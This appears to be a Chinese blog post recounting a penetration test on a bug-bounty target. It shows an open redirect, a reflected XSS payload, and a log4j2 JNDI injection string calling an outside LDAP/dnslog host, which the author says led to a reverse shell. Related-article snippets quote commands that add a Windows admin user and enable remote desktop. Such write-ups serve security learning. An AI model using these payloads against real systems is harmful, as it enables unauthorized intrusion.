一次渗透经历

最新推荐文章于 2024-07-22 20:25:53 发布
最新推荐文章于 2024-07-22 20:25:53 发布
阅读量510 收藏 3
点赞数 1
文章标签: log4j 安全 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wuliyoumaozhi/article/details/126628517
版权

前言

一个学稀奇古怪打发时间的程序员

目标

本次渗透的目标是补天上某项目,通过信息收集找到了登陆界面

对一个网站渗透的方法有很多,遇到这样的界面我们通常的思路就是查网站源码、万能密码登录、XSS、SQL注入、密码爆破、修改code进行未授权访问、未受保护的api信息泄露、忘记密码的逻辑绕过、命令执行如log4j2等漏洞,这时候就看我们各自的骚操作了。

第一个漏洞:url任意跳转

直接F12大法,看一下网站前段源码

 找到了一段跳转代码:

https://127.0.0.1/index?client_name=CasClient&realRequestUrl=https://xxx.com/abc

替换掉realRequestUrl参数为https://www.baidu.com

https://127.0.0.1/index?client_name=CasClient&realRequestUrl=https://www.baidu.com

第二个漏洞:XSS漏洞

在登录界面随便输入一个账号密码test,看一下返回的信息

得到错误信息,发现url里面有Get类型的错误参数,如果没有过滤的话我们将文字替换为<script>alert('1')</script> 可以得到XSS漏洞,没有过滤,拿下xss

第三个漏洞:log4j2命令执行

后台渗透了一下,没进去,还是我太菜了,于是转到主页面进行渗透,任何一个参数都有可能是我们渗透过程中的刺刀。通过打入XSS、SQL和命令执行语句来进行判断网站是否存在漏洞。经过各个参数的注入,找到一个参数可以执行log4j2漏洞

playload为:https://127.0.0.1/search/opportunity?searchType=${jndi:ldap://test.7ih4h0.dnslog.cn}&pageNumber=1

然后利用jndi注入工具在攻击机上开启jndi服务器,利用payload开始攻击,获得反弹shell

结语

每一个参数都有可能是我们渗透成功的利刃,不要因为个别参数不行而放弃所有参数

 

雾里有果橙
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
一次曲折的渗透测试之旅1
08-03
在本文中,作者分享了一次具体的渗透测试经历,这是一次授权测试,即得到目标网站所有者的许可进行的测试。首先,进行了信息收集阶段,这是渗透测试的第一步。通过扫描子域名和端口,获取目标系统的基本信息。在这次...
渗透测试】浅记一次挖洞经历
网络安全从业者的学习笔记
04-16 6678
一次比较愉快的挖洞历程 一开始拿到主站,翻了翻没啥可用的中间件漏洞版本信息。所以,还是那句老话:柿子还是要挑软的捏。光速去搜寻他的旁站(我用的是奇安信的Hunter)。 果不其然搜索到了他的后台登录系统。既然是登录,当然要用BP去爆破一下他的密码了。一般后台用户名要么是admin,要么是root。 很幸运,又让我成功的爆破了出来他的密码。弱口令+1。 进入后台,就要尝试有没有出现未授权访问了,没有的话也别灰心,继续去找它的功能点,比如他的搜索框。(很容易有SQL注入) 用BP抓..
一次真实渗透经历
qq_39682037的博客
05-23 3894
背景小编就不多解释了,小编在某站点扫描时,发现其可能存在上传漏洞 小编想上传一句话木马,但是发现该站点对文件后缀进行了过滤,故采用burpsuite抓包实现一句话木马文件上传 成功上传之后,利用一句话木马进行连接 利用菜刀工具的cmd创建用户添加管理员组,打开3389端口允许远程连接。 例: net user test test /add net localgroup administrators test /add REG ADD HKLM\SYSTEM\CurrentControlSet\Con
一次难忘的渗透测试
蚁景网安学院
08-30 541
0*00前言前几天,我一个朋友叫我帮忙测试一下他们公司的网站,本来我是不愿意的,但是无奈被一顿火锅收买了。0*01信息收集环境是php+apache端口扫描御剑扫一波目录御剑,发现rob...
一次曲折的渗透测试经历
乐枕的家
04-21 1万+
昨天把jexboss脚本整合到我的多线程框架里,扫了一遍全国jboss,发现一千多个shell.工具地址在:https://github.com/Xyntax/POC-T随意拿了一个看似大厂商的,作本次入侵测试发现传送门通过jexboss拿到shell,看到是centos的机器(IP已打码).看起来是root,确认一下.不稳定的传送门shell的问题接下来执行命令的时候,发现这个jexboss自带的
记录一次渗透测试艰难打点的过程
include_voidmain的博客
06-07 1514
记录一次渗透测试艰难打点的过程
渗透测试之渗透某培训平台经历
hackzkaq的博客
04-06 614
零基础学黑客,搜索公众号:白帽子左一 某天工作室小伙伴发了个某学校培训平台的URL给我说有注入,于是我们俩就开始了愉快的渗(mo)透(yu)旅程 从注入摸到XXE 首先这个站有一个学生登录口和一个管理登录口: 自然是先用学生身份注册一个账号,进去之后到处摸,然后在课程支付的地方找到一个注入点 因为这个培训平台的所有课程都是付费的,所以首先需要支付才能进行学习。在点击支付后会生成一个支付记录,然后跳转至另一个外部网站进行支付过程。然后就找到一个支付记录查询的页面: 对应HTTP包抓一下,发现user_c
作为渗透测试工程师,你有什么有趣的经历
weixin_51725318的博客
04-07 446
作为渗透测试工程师,你有什么有趣的经历
一次完整的内网渗透经历
weixin_51725318的博客
08-10 123
一次完整的内网渗透经历
一次被黑经历与反思.pdf
05-19
一次被黑经历与反思.pdf
08-一次曲折的渗透测试之旅.pdf
09-20
08-一次曲折的渗透测试之旅.pdf
一次曲折而又有趣的渗透R3start1
08-03
【记一次曲折而又有趣的渗透R3start1】这篇文章记录了一位网络安全专家进行渗透测试的历程,涉及了网络协议、.NET和Apache等技术领域。在这个过程中,作者遇到多个挑战,经历了多次尝试和失败,最终成功获取了目标...
web渗透实例
12-08
本文是一次针对特定网站进行渗透测试的真实案例记录。渗透测试的目标是评估Web应用的安全性,并识别潜在的安全漏洞。作者kyo327在文章中详细描述了整个渗透过程中的策略和技术手段。 #### 二、初期探索阶段 在渗透...
Web渗透-一次艰难获取后台经历-metinfo5.3.18密码重置漏洞复现
qq_45066095的博客
08-26 1075
前期准备 内部搭建环境进行了一次为期两天的演练,通过给的测试地址发现这是一个静态网页,发现URL中有参数id=某某数,心想着这就要被我挖掘出来了,我激动的手指颤抖着敲打键盘,尝试用sqlmap跑了下发现进行了拦截,最后手工尝试也没成功。然后又尝试看有没有跨站漏洞,发现对输入的数据进行了过滤。内心一下子就拔凉拔凉的,打算擦干眼泪接着整,不信挖掘不到漏洞,准备大干一场。开始扫描端口和目录,余光一扫看到吃饭点了,迅速关上电脑迈着欢快的步伐。。。。。。 挖掘漏洞 吃得饱饱的回来查看开放的端口 发现开放shh,进行
渗透测试以及安全面试的经验之谈-技术篇
weixin_34100227的博客
06-18 9914
技术面试问题 CTF 说一个印象深刻的CTF的题目 Padding Oracle->CBC->密码学(RSA/AES/DSA/SM) CRC32 反序列化漏洞 sql二次注入 第一次进行数据库插入数据的时候,仅仅只是使用了 addslashes 或者是借助 get_magic_quotes_gpc 对其中的特殊字符进行了转义,在写入数据库的时候还是保留了原来的数据,但是数据本身还是...
最新渗透测试面试题合集
热门推荐
网络安全
05-17 1万+
⽹上整理的渗透测试⾯试问题⼤全,有些 HW ⾯试的题,已经收集好了,提供给⼤家。现在就是毕业季节,希望各位都能找到好工作。 渗透篇 1、介绍⼀下⾃认为有趣的挖洞经历 挖洞也有分很多种类型,⼀种是以渗透、⼀种是以找漏洞为主,如果是前者会想各种办法获取权限继⽽获取想要的的东⻄完成渗透⽬标,这类跟 HW 类似,⽬标各种漏洞不算,要有 Shell,服务器权限才给分,这才是最接近实战渗透,跟某部⻔有合作的话也是属于这种打击⽹络犯罪获得权限、传销数据、组织架构,服务器权限、等…
浅析渗透测试之手动和自动的优缺点
ichunqiu2018的博客
02-12 3376
手动渗透测试和自动渗透测试本是出于相同的目的,即帮助企业主动发现漏洞,了解现有安全措施的成效或不足。它们之间的唯一区别就是执行方式不同,手动渗透测试是由人工来完成,自动渗透测试是由机器本身完成。 那么,手动与自动渗透测试孰优孰劣?我们不妨来比较一下各自的优缺点。 手动渗透测试 在手动渗透测试中,机器的脆弱性和风险是由渗透测试工程师或安全专家进行测试。 通常,执行的方法有: 1、数据收集:数据收集在测试中起着关键作用。一个人可以手动收集数据,也可以使用在线免费提供的工具服务(网页源代码分析技术等)。这些工具
什么是渗透测试,渗透测试中的7个环节
liuruo11000的博客
09-27 352
该环节有可能是存有网站渗透测试环节中最迷人的地方,随后在这样的情况下,一般没有客户所预料的那样一帆风顺,反而是曲径通幽处,在进攻总体目标系统主机时,一定要清楚的了解在目的系统软件存有这一系统漏洞,不然,根本没办法运行进攻取得成功的流程。该环节将综合性从之前好多个环节上掌握到的数据,从这当中剖析了解这些进攻和用方式是合理的,尤其是要重点剖析端口号和漏扫描结果,捕获到提供服务的关键信息,及在信息搜集环节上获得别的关键的定位信息。该环节一般是用于明确网站渗透测试的范畴与目标。
Log4j:深入理解其原理及使用
最新发布
Aaron_945的博客
07-22 550
Log4j提供了扩展接口,允许开发者自定义Appender和Layout,以满足特殊的日志记录需求。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

雾里有果橙

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值